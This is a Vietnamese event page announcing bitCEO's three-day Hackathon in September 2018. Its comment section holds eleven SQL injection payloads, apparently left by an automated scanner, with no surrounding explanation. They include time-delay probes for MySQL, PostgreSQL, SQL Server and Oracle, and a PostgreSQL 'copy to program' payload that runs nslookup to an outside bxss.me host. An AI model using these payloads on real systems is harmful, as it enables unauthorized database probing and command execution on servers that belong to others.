• 22

HACKATHON

Cuộc thi Hackathon được tổ chức xuyên suốt trong 3 ngày (23-25/09/2018) của sự kiện. Đây là đấu trường trí tuệ, nơi bitCEO và các nhà đồng tài trợ khác có thể tìm thấy những đội ngũ Lập trình viên đầy tài năng. Những giải thưởng ấn tượng xứng đáng cho những Lập trình viên tài ba. bitCEO sẽ luôn đồng hành và phát triển Hackathon với sứ mệnh hình thành một liên minh Developers có thể thay đổi thế giới công nghệ với những đột phá trong tương lai.

 

Related posts

22 thoughts on “HACKATHON

 1. -1 OR 3+858-858-1=0+0+0+1 —

 2. (select(0)from(select(sleep(24)))v)/*’+(select(0)from(select(sleep(24)))v)+'”+(select(0)from(select(sleep(24)))v)+”*/

 3. CGRtJfWS’; waitfor delay ‘0:0:16’ —

 4. 59arueBd’);select pg_sleep(8); —

 5. 1′;copy (select ”) to program ‘nslookup dns.sqli.\013436.407-214.407.5f135.\1.bxss.me

 6. 0’XOR(if(now()=sysdate(),sleep(6),0))XOR’Z

 7. -1; waitfor delay ‘0:0:6’ —

 8. hgehf3Qs’; waitfor delay ‘0:0:3’ —

 9. -1));select pg_sleep(9); —

 10. anVl5QfF’));select pg_sleep(3); —

 11. 555’||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),6)||’

Leave a Reply

Your email address will not be published. Required fields are marked *

close